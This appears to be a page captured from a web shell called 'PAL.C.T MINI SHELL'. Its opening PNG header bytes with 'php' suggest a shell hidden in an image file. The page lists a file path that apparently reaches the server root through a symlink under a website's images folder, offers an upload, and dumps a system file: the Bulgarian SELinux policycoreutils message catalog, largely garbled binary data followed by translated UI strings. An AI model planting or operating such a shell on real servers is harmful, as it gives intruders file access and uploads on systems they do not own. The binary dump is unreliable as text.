php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/bg/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/bg/LC_MESSAGES/policycoreutils.mo

*l"H.I.].q..?.;.&/?/7\//////////00-0G0X0q0w0${0M050)$1lN1)112262"R2u22!2'2D2BA33A4Q44m4&4,4%425O55l5T5<5(46,]626.6%6(74;7p7]7C7(.8W8$
9/9%M9-s9x9:(&:O:2W:::2:#:1:21;d;~;9<=
~>>>P>>!?6?"Q?t???-?(?1 @*R@2}@(@@$@A :A[A"{A$A!AA%B'B GB hBB$BB%BC$*C'OCwCCCCC"D#DAD VD wDD$DD%DE9EQE#qEEEEEF&F!EF"gF!F&F$F/F4(G2]GG$G)G.G,(H)UH.H,H)H.I,4I$aIIII	I	IIII
J-$J(RJ2{J2J-J*K*:K%eK%K*K.K,L/8L$hL/L+L-L+M+CM'oM$M,M-M0N.HN+wN0N+N(O))O+SO,O+O#O%O#"P)FP,pP+P+P+P-!Q+OQ-{Q-Q.Q(R-/R/]R.R$R)R)S.5S-dS*S*S/S-T*FT.qT2T+T*T.*U*YU0U+U-U-V+=V-iV,V+V,V)W*GW)rW&W+W,W*X,GX,tX+X-X*X*&Y*QY*|Y)Y*Y%Y/"Z-RZ)Z&Z/Z-[//[&_[0[#[-[-	\*7\)b\%\+\-\+]$8](]]*]*]$]0^-2^*`^#^+^/^3_.?_&n_+_._*_+`+G`+s`,`+`/`+(a)Ta-~a*a*a-b/0b)`b,b+b/b0c*Dc)oc.c-c+c,"d.Od-~d)d)d)e,*e,Wee1e:e9eN4fff	f2fJf*g Dgeg"g+g&gg#h2h!Ph%rhhh!h h i
5i@i^i	qi{i
ii	i;i"ijj#j)j
Dj
Oj]j4ijjj j6j!k*k3kPkck
vkk
k<k#k	l	lll!l
0l
>lLl	^lhl|llllllllllm	m
m(m/m
@mNmSm2nmmmm8mnn!n'n0nPn]nunnn&nno"o@o[o`o{oooooo
opp*pCpPp`p:qp7ppq!q%q+qDq,QqF~q&q:q'r's<?s|s0s5s6s't-tBtItgt,t3t4t2u4Muuu)&vPv"mv,vvvvw)w5wIw^wvw*ww'w'x*x];xx
xx*xxyLy_ycyky<yyy_y8z,Pz4}z#z,z({(,{U{"k{{{{{{|.|I|g|o|w|||||"||#|7};}@}$F}k}}}#}W}+A+VR@<-jnwƁ3
+>Cj;2PnNq^
_jjGՆn?U̇I"BldcxL(fu`܌M=CaύA1xspX-le~gjL_Yq(iؔBgݖZECmRL.{zAE\IGtUcRo|kOԡPDVK:S"3v>8e"po]ivǥT>CKצ7#:[?B֧LAf7U:6TqDƩINU:Wߪ37Mk<7S.NLѬM_lX̭I%ZoFʮOPa<Y5I1KP<N53E9;AuIbOdX_
imr״nJ7T]FfbYnbȷ^+gplcFйQi$n5º-R&$yFAZ'[F޼C%Ii>>I1M{KɾN=dNJL<JJ@=`KLO7MJO JpAHJFKJ<(>e<HK*JvJJLWJLL<MALNfMDHHHML(IuClLpIM\UJIMGIOJ/LzLJL_NJKFHIH%?nJKIEKKJ'LrII	ISIHI0>zHLHO?OL(Nu?O<TLLI+Hu>JLHJ=AC`I=I,LvI<
JJNRM7?JMI^JJJ>KJN JoHLIPIL^1HKJ%SpOIH^MLJBKML'HtHHKOKbr[P+"f,62DiDJQ>O?L ImPW8`::::J<' 7'X@Wdk?ti0_7qZc7v66!&>!eK^k 1N7'/"6Y
w(-b)}^<
KVg3y@O3K-I+,@$m3"L*w*$4Ises:M74}M5z,C+o!a`xa;$Af3y@[fJge	g		
L>kR_H]L%2
L
.c
#
2
B
O,3|@X/Jz2?/rf4Kg:41YkFUZTc[:TODF703hLFB06s->+O{,9,O|D8b?\Nr@~omtJ;iV<H=S5g$BW|.Pn'ge!yp	lK6W*%<M+(+4]}j)|kIA(Nh^c!!_AQw#`h%]O~#	_"F5{/%[CObx-L*o
[4E^2/{1vY2?
#zja,Tr@\UB wHEZQ>:xp s
f ne7X0&
9d0=
9yPiFL-zUS)csdG'mu33)RM;vI8:q617"('D$Zq"K}JYR>	`G&l*tfT,.V
Duk&X$Ca%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy:  %s
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdminAllAllow Samba to share nfs directoriesAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined to dyntrans to unconfined_execmemAllow unlabeled packets to flow on the networkAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?BooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux usersCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not modify SELinux user %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set message context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set port context for %s/%sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCouldn't get default type.
CronCurrent Enforcing ModeDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDo not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
ExecutableFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdKerberosLabelingLinux User %s does not existLoad Policy ModuleLoad policy moduleLogin
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionModify %sModify File ContextModify SELinux User MappingModule NameMountNFSNISNameName ServiceNetwork ConfigurationNo context in file %s
Options Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 PrefixPrintingProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRoleSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Setup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
SquidStandard Init DaemonStatusSystem Default Enforcing ModeSystem Default Policy Type: To make this policy package active, execute:Transition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.Unable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsVersionWarning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)XENXServerYou must enter a executableYou must enter the executable path for your confined process_Delete_Propertiesall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
label37label38label39label41label42label44label50newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
pppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeuse_syslog must be a boolean value Project-Id-Version: policycoreutils
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2008-03-10 21:37+0100
Last-Translator: Alexander Todorov <atodorov@redhat.com>
Language-Team: Bulgarian <dict@fsa-bg.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: bg
%s промяна на етикетите.
%s вече е в %s%s не е валиден контекст
%s не е в %s%s!  Не може да се определи текущия контекст за %s, tty няма да се преетикира.
%s!  Не може да се определи новия контекст за %s, tty няма да се преетикира.
%s!  Не може да се определи новия контекст за %s
%s:  Не може да се зареди политика:  %s
********************** ВАЖНО *************************
...600-1024<b>Приложения</b><b>Изберете:</b><b>TCP портове</b><b>UDP портове</b>ДобавянеДобавяне на %sДобавяне на файлов контекстДобавяне на мрежов портДобавяне на SELinux входно съответствиеДобавяне на SELinux мрежови портовеДобавяне на SELinux потребителДобавяне на SELinux съответствие за потребителАдминистраторВсичкиРазрешаване на Samba да споделя nfs директорииРазрешаване на сървъра X-Windows да ползва части от паметта едновременно за писане и изпълнениеРазрешаване на всички демони да ползват незаделени tty конзолиРазрешаване на всички демони да пишат core файлове в /Разрешаване на cdrecord да чете разнородно съдържание. nfs, samba, преносими устройства, потребителски временни файлове и файлове с несигурно съдържаниеРазрешаване на клиентите да пишат в споделената памет на XРазрешаване на демоните да работят с NISРазрешаване на evolution и thunderbird да четат потребителски файловеРазрешаване на изпълним стек за javaРазрешаване на mount да монтира всяка директорияРазрешаване на mount да монтира всеки файлРазрешаване на изпълним стек за mplayerРазрешаване на нормалните потребители да стартират pingРазрешаване pppd да се стартира за обикновен потребителРазрешаване на привилегировани инструменти като hotplug и insmod да работят неограничениРазрешаване на програмите да четат файлове от настандартни места (default_t)Разрешаване на rc скриптовете да стартират неограничени, включително всеки rc скрипт, който няма изрично дефиниран преход към домейнРазрешаване на обикновените потребители директен достъп до мишката (само на X сървъра)Разрешаване на rpm да стартира неограниченРазрешаване на удостоверяващия сървър sasl да чете /etc/shadowРазрешаване на достъп до домашните директории на spamdРазрешаване на мрежов достъп на демона squidРазрешаване на ssh вход като sysadm_r:sysadm_tРазрешаване ssh да се стартира от inetd вместо като демонРазрешаване на ssh да стартира ssh-keysignРазрешаване на staff уеб браузърите да пишат в домашните директорииРазрешаване на staff_r потребителите да претърсват sysadm домашната директория и да четат файлове (като ~/.bashrc примерно)Разрешаване на демона stunnel да работи самостоятелно, извън xinetdРазрешаване на sysadm_t да стартира директно демониРазрешаване на mozilla браузъра да чете потребителски файловеРазрешаване на unconfined (неограничените) динамично да преминава към unconfined_execmemРазрешаване на неетикирани пакети да пътуват в мрежатаРазрешаване на потребителите да се свързват с mysql гнездоРазрешаване на потребителите да се свързват с postgres гнездоРазрешаване на потребителите ч/з noextattrfile (FAT, CDROM, FLOPPY)Разрешаване на потребителите stat върху tty файловеРазрешаване на user_r преход към sysadm_r чрез su, sudo, или userhelper. В противен случай, само staff_r може да го правиРазрешаване на потребителите да контролират мрежови интерфейси (трябва и USERCTL=true за интерфейса)Разрешаване на потребителите да изпълняват командата mountРазрешаване на потребителите да стартират TCP услуги (се закачат на портове и да приемат връзки от същия домейн и външни потребители).  Забраната на това налага ползването на пасивен FTP режим и може да промени и други протоколиРазрешаване на потребителите да стартират командата dmesgРазрешаване на потребителите ч/з на usb устройстваРазрешаване на xdm вход като sysadm_r:sysadm_tРазрешаване на xen да чете/пише физически дискови устройстваРазрешаване на xinetd да стартира неограничени, включително нямащи изрично дефиниран преход към домейн услугиПриложениеСигурни ли сте, че искате да изтриете %s '%s'?БулеваБулевата променлива %s е дефинирана в политика, не може да се изтриеБулева променлива %s не е дефиниранаCVSНе може да се комбинира +/- с други типове категорииНе може да има няколко чувствителностиНе може да се промени нивото на чувствителност ползвайки '+' на %sНе може да се намери вашия запис във файла shadow.
Не може да се прочете хранилището с политики.Смяната на типа на политиката ще предизвика преетикиране на цялата система следващия рестарт. Преетикирането отнема много време в зависимост от размера на файловата система.  Искате ли да продължите?Изключването на SELinux изисква рестарт.  Не е препоръчително.  Ако по-късно решите да включите отново SELinux, системата ще трябва да се преетикира.  Ако просто искате да видите дали SELinux предизвиква проблем във Вашата система, можете да преминете в пасивен режим, който само ще рапортува в дневниците грешките и няма да налага SELinux политиката.  Пасивния режим не изисква рестарт. Искате ли да продължите?Включването на SELinux ще предизвика преетикиране на цялата файлова система следващия рестарт. Преетикирането отнема много време в зависимост от размера на файловата система.  Искате ли да продължите?СъвместимостНастройка на SELinuxКонтекстCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Не може да се добави SELinux потребител %sНе може да се добави контекст на файл за %sНе може да се добави интерфейс %sНе може да се добави съответствие за вход за %sНе може да се добави порт %s/%sНе може да се добави префикс %s за %sНе може да се добави роля %s за %sНе може да се провери дали SELinux потребител %s е дефиниранНе може да се провери дали булевата променлива %s е дефиниранаНе може да се провери дали файловия контекст за %s е дефиниранНе може да се провери дали интерфейс %s е дефинираноНе може да се провери дали е дефинирано съответствие за вход на %sНе може да се провери дали порт %s/%s е дефиниранНе могат да се затворят дескриптори.
Не може да се създаде SELinux потребител за %sНе може да се създаде ключ за %sНе може да се създаде ключ за %s/%sНе може да се създаде контекст за %sНе може да се създаде контекст за %s/%sНе може да се създаде файлов контекст за %sНе може да се създаде интерфейс за %sНе може да се създаде ключ за %sНе може да се създаде съответствие за вход за %sНе може да се създаде порт за %s/%sНе може да се създаде semanage обект за управлениеНе може да се изтрие SELinux потребител %sНе може да се изтрие булева променлива %sНе може да се изтрие файловия контекст за %sНе може да се изтрие интерфейс %sНе може да се изтрие съответствието за вход за %sНе може да се изтрие порт %s/%sНе може да се определи режима на налагане.
Не може да се направи semanage връзкаНе може да се извлече ключ за %sНе могат да бъдат получени SELinux потребителитеНе могат да се получат булевите променливиНе може да се получат файловите контекстиНе може да се получи списък с интерфейситеНе може да се получат локалните файловите контекстиГрешка при получаване на съответствията за входНе може да се получи списък на портоветеНе могат да бъдат получени ролите за потребител %sНе може да се промени SELinux потребител %sНе може да се промени булевата променлива %sНе може да се промени файловия контекст за %sНе може да се промени интерфейс %sНе може да се промени съответствието за вход за %sНе може да се промени порт %s/%sНе може да се отвори файл %s
Не може да се провери файловия контекст %sНе може да се провери файловия контекст за %sНе може да се провери интерфейс %sНе може да се провери порт %s/%sНе може да се запита seuser за %sНе може да се провери потребителя за %sНе може да се зададе MLS ниво за %sНе може да се зададе MLS диапазон за %sНе може да се зададе SELinux потребител за %sНеуспешно установяване контекста на изпълнение на %s.
Не може да се установи контекст на файл за %sНе може да се установи интерфейсен контекст за %sНе може да се установи контекста на съобщението за %sНе могат да се приведат mls полетата в контекст на файл за %sНе могат да се приведат mls полетата в интерфейсен контекст за %sНе могат да се приведат mls полетата в контекст на порта за %s/%sНе може да се зададе името за %sНе може да се приведе контекста на порта за %s/%sНе може да се приведе ролята в контекст на файл за %sНе може да се приведе ролята в интерфейсен контекст за %sНе може да се приведе ролята в контекст на порта за %s/%sНе може да се приведе типа в контекст на файл за %sНе може да се приведе типа в интерфейсен контекст за %sНе може да се приведе типа в контекст на порта за %s/%sНе може да се приведе потребителя в контекст на файл за %sНе може да се приведе потребителя в интерфейсен контекст за %sНе може да се приведе потребителя в контекст на порта за %s/%sНе може да се стартира semanage транзакцияНе може да се определи подразбиращия се тип.
CronТекущ активен режимБази данниИзтриване на %sИзтриване на файлов контекстИзтриване на мрежов портИзтриване на SELinux съответствие за потребителИзключване на одитаИзключване на SELinux защитата за Cluster ServerИзключване на SELinux защитата за EvolutionИзключване на SELinux защитата за демона за NIS паролиИзключване на SELinux защитата за демона NIS трансфериИзключване на SELinux защитата за NetworkManagerИзключване на SELinux защитата за ThunderbirdИзключване на SELinux защитата за демона acctИзключване на SELinux защитата за amandaИзключване на SELinux защитата за amavisИзключване на SELinux защитата за демона apmdИзключване на SELinux защитата за демона arpwatchИзключване на SELinux защитата за демона auditdИзключване на SELinux защитата за демона automountИзключване на SELinux защитата за avahiИзключване на SELinux защитата за демона bluetoothИзключване на SELinux защитата за демона cannaИзключване на SELinux защитата за демона cardmgrИзключване на SELinux защитата за демона cipedИзключване на SELinux защитата за демона clamdИзключване на SELinux защитата за clamscanИзключване на SELinux защитата за clvmdИзключване на SELinux защитата за демона comsatИзключване на SELinux защитата за демона courierИзключване на SELinux защитата за демона cpucontrolИзключване на SELinux защитата за демона cpuspeedИзключване на SELinux защитата за демона crondИзключване на SELinux защитата за демона cups hplipИзключване на SELinux защитата за демона cupsdИзключване на SELinux защитата за cupsd_lpdИзключване на SELinux защитата за демона cvsИзключване на SELinux защитата за демона cyrusИзключване на SELinux защитата за демона dbskkdИзключване на SELinux защитата за демона dbusdИзключване на SELinux защитата за dccdИзключване на SELinux защитата за dccifdИзключване на SELinux защитата за dccmИзключване на SELinux защитата за демона ddtИзключване на SELinux защитата за демона devfsdИзключване на SELinux защитата за демона dhcpcИзключване на SELinux защитата за демона dhcpdИзключване на SELinux защитата за демона dictdИзключване на SELinux защитата за демона distccdИзключване на SELinux защитата за демона dmesgИзключване на SELinux защитата за демона dnsmasqИзключване на SELinux защитата за демона dovecotИзключване на SELinux защитата за демона entropydИзключване на SELinux защитата за fetchmailИзключване на SELinux защитата за демона fingerdИзключване на SELinux защитата за демона freshclamИзключване на SELinux защитата за демона fsdaemonИзключване на SELinux защитата за игритеИзключване на SELinux защитата за демона gpmИзключване на SELinux защитата за демона gssИзключване на SELinux защитата за демона hostnameИзключване на SELinux защитата за демона hotplugИзключване на SELinux защитата за демона howlИзключване на SELinux защитата за http suexecИзключване на SELinux защитата за превъртане на httpd дневницитеИзключване на SELinux защитата за демона hwclockИзключване на SELinux защитата за демона i18nИзключване на SELinux защитата за демона imazesrvИзключване на SELinux защитата за демоните деца на inetdИзключване на SELinux защитата за демона inetdИзключване на SELinux защитата за демона inndИзключване на SELinux защитата за демона iptablesИзключване на SELinux защитата за демона ircdИзключване на SELinux защитата за демона irqbalanceИзключване на SELinux защитата за демона iscsiИзключване на SELinux защитата за демона jabberdИзключване на SELinux защитата за демона kadmindИзключване на SELinux защитата за демона klogdИзключване на SELinux защитата за демона krb5kdcИзключване на SELinux защитата за демоните ktalkИзключване на SELinux защитата за демона kudzuИзключване на SELinux защитата за демона locateИзключване на SELinux защитата за демона lpdИзключване на SELinux защитата за демона lrrdИзключване на SELinux защитата за демона lvmИзключване на SELinux защитата за mailmanИзключване на SELinux защитата за демона mdadmИзключване на SELinux защитата за демона monopdИзключване на SELinux защитата за демона mrtgИзключване на SELinux защитата за 